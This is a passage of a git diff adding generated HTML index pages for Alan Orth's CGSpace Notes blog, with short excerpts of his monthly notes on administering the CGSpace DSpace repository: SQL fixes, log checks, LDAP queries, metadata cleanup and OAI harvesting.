+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-02/">February, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-02-07T07:04:52-08:00">Tue Feb 07, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-02-07">2017-02-07</h2>
+<ul>
+<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+</code></pre><ul>
+<li>Create issue on GitHub to track the addition of CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/issues/301">#301</a>)</li>
+<li>Looks like we&rsquo;ll be using <code>cg.identifier.ccafsprojectpii</code> as the field name</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2017-01/">January, 2017</a></h2>
+    <p class="blog-post-meta"><time datetime="2017-01-02T10:43:00+03:00">Mon Jan 02, 2017</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2017-01-02">2017-01-02</h2>
+<ul>
+<li>I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error</li>
+<li>I tested on DSpace Test as well and it doesn&rsquo;t work there either</li>
+<li>I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2017-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-12/">December, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-12-02T10:43:00+03:00">Fri Dec 02, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-12-02">2016-12-02</h2>
+<ul>
+<li>CGSpace was down for five hours in the morning while I was sleeping</li>
+<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
+</ul>
+<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
+</code></pre><ul>
+<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
+<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
+<li>Another worrying error from dspace.log is:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-11/">November, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-11-01T09:21:00+03:00">Tue Nov 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-11-01">2016-11-01</h2>
+<ul>
+<li>Add <code>dc.type</code> to the output options for Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/pull/286">#286</a>)</li>
+</ul>
+<p><img src="/cgspace-notes/2016/11/listings-and-reports.png" alt="Listings and Reports with output type"></p>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-10/">October, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-10-03T15:53:00+03:00">Mon Oct 03, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-10-03">2016-10-03</h2>
+<ul>
+<li>Testing adding <a href="https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing">ORCIDs to a CSV</a> file for a single item to see if the author orders get messed up</li>
+<li>Need to test the following scenarios to see how author order is affected:
+<ul>
+<li>ORCIDs only</li>
+<li>ORCIDs plus normal authors</li>
+</ul>
+</li>
+<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new coloum called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li>
+</ul>
+<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-09/">September, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-09-01T15:53:00+03:00">Thu Sep 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-09-01">2016-09-01</h2>
+<ul>
+<li>Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors</li>
+<li>Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace</li>
+<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
+<li>It looks like we might be able to use OUs now, instead of DCs:</li>
+</ul>
+<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-08/">August, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-08-01T15:53:00+03:00">Mon Aug 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-08-01">2016-08-01</h2>
+<ul>
+<li>Add updated distribution license from Sisay (<a href="https://github.com/ilri/DSpace/issues/259">#259</a>)</li>
+<li>Play with upgrading Mirage 2 dependencies in <code>bower.json</code> because most are several versions of out date</li>
+<li>Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more</li>
+<li>bower stuff is a dead end, waste of time, too many issues</li>
+<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li>
+<li>Start working on DSpace 5.1 → 5.5 port:</li>
+</ul>
+<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-07/">July, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-07-01T10:53:00+03:00">Fri Jul 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-07-01">2016-07-01</h2>
+<ul>
+<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
+<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+ text_value
+------------
+(0 rows)
+</code></pre><ul>
+<li>In this case the select query was showing 95 results before the update</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-06/">June, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-06-01T10:53:00+03:00">Wed Jun 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-06-01">2016-06-01</h2>
+<ul>
+<li>Experimenting with IFPRI OAI (we want to harvest their publications)</li>
+<li>After reading the <a href="https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html">ContentDM documentation</a> I found IFPRI&rsquo;s OAI endpoint: <a href="http://ebrary.ifpri.org/oai/oai.php">http://ebrary.ifpri.org/oai/oai.php</a></li>
+<li>After reading the <a href="https://www.openarchives.org/OAI/openarchivesprotocol.html">OAI documentation</a> and testing with an <a href="http://validator.oaipmh.com/">OAI validator</a> I found out how to get their publications</li>
+<li>This is their publications set: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc">http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc</a></li>
+<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
+<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-05/">May, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-05-01T23:06:00+03:00">Sun May 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-05-01">2016-05-01</h2>
+<ul>
+<li>Since yesterday there have been 10,000 REST errors and the site has been unstable again</li>
+<li>I have blocked access to the API now</li>
+<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/8/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/10/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/index.html b/docs/posts/index.html
new file mode 100644
index 000000000..46efd49f9
--- /dev/null
+++ b/docs/posts/index.html
@@ -0,0 +1,440 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-07/">July, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-07-01T17:14:36+03:00">Sat Jul 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2023-07-01 Export CGSpace to check for missing Initiative collection mappings Start harvesting on AReS 2023-07-02 Minor edits to the crossref_doi_lookup.py script while running some checks from 22,000 CGSpace DOIs 2023-07-03 I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect I took the more accurate ones from Crossref and updated the items on CGSpace I took a few hundred ISBNs as well for where we were missing them I also tagged ~4,700 items with missing licenses as &ldquo;Copyrighted; all rights reserved&rdquo; based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it&rsquo;s usually copyrighted (could still be open access, but we can&rsquo;t tell via Crossref) I would be curious to write a script to check the Unpaywall API for open access status&hellip; In the past I found that their license status was not very accurate, but the open access status might be more reliable More minor work on the DSpace 7 item views I learned some new Angular template syntax I created a custom component to show Creative Commons licenses on the simple item page I also decided that I don&rsquo;t like the Impact Area icons as a component because they don&rsquo;t have any visual meaning 
+  <a href='https://alanorth.github.io/cgspace-notes/2023-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-06/">June, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-06-02T10:29:36+03:00">Fri Jun 02, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-06-02">2023-06-02</h2>
+<ul>
+<li>Spend some time testing my <code>post_bitstreams.py</code> script to update thumbnails for items on CGSpace
+<ul>
+<li>Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail&hellip;</li>
+</ul>
+</li>
+<li>Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
+<ul>
+<li>They have experience with improving the MODS interface in MELSpace&rsquo;s OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace</li>
+<li>From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-05/">May, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-05-03T08:53:36+03:00">Wed May 03, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-05-03">2023-05-03</h2>
+<ul>
+<li>Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+<ul>
+<li>It seems their password expired, which is annoying</li>
+</ul>
+</li>
+<li>I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+<ul>
+<li>There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;</li>
+<li>Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly</li>
+</ul>
+</li>
+<li>Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-04/">April, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-04-02T08:19:36+03:00">Sun Apr 02, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-04-02">2023-04-02</h2>
+<ul>
+<li>Run all system updates on CGSpace and reboot it</li>
+<li>I exported CGSpace to CSV to check for any missing Initiative collection mappings
+<ul>
+<li>I also did a check for missing country/region mappings with csv-metadata-quality</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-03/">March, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-03-01T07:58:36+03:00">Wed Mar 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-03-01">2023-03-01</h2>
+<ul>
+<li>Remove <code>cg.subject.wle</code> and <code>cg.identifier.wletheme</code> from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)</li>
+<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28">iso-codes 4.13.0 was released</a>, which incorporates my changes to the common names for Iran, Laos, and Syria</li>
+<li>I finally got through with porting the input form from DSpace 6 to DSpace 7</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-02/">February, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-02-01T10:57:36+03:00">Wed Feb 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-02-01">2023-02-01</h2>
+<ul>
+<li>Export CGSpace to cross check the DOI metadata with Crossref
+<ul>
+<li>I want to try to expand my use of their data to journals, publishers, volumes, issues, etc&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-01/">January, 2023</a></h2>
+    <p class="blog-post-meta"><time datetime="2023-01-01T08:44:36+03:00">Sun Jan 01, 2023</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-01-01">2023-01-01</h2>
+<ul>
+<li>Apply some more ORCID identifiers to items on CGSpace using my <code>2022-09-22-add-orcids.csv</code> file
+<ul>
+<li>I want to update all ORCID names and refresh them in the database</li>
+<li>I see we have some new ones that aren&rsquo;t in our list if I combine with this file:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2023-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-12/">December, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-12-01T08:52:36+03:00">Thu Dec 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-12-01">2022-12-01</h2>
+<ul>
+<li>Fix some incorrect regions on CGSpace
+<ul>
+<li>I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions</li>
+</ul>
+</li>
+<li>Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!</li>
+<li>Replace &ldquo;East Asia&rdquo; with &ldquo;Eastern Asia&rdquo; region on CGSpace (UN M.49 region)</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-11/">November, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-11-01T09:11:36+03:00">Tue Nov 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-11-01">2022-11-01</h2>
+<ul>
+<li>Last night I re-synced DSpace 7 Test from CGSpace
+<ul>
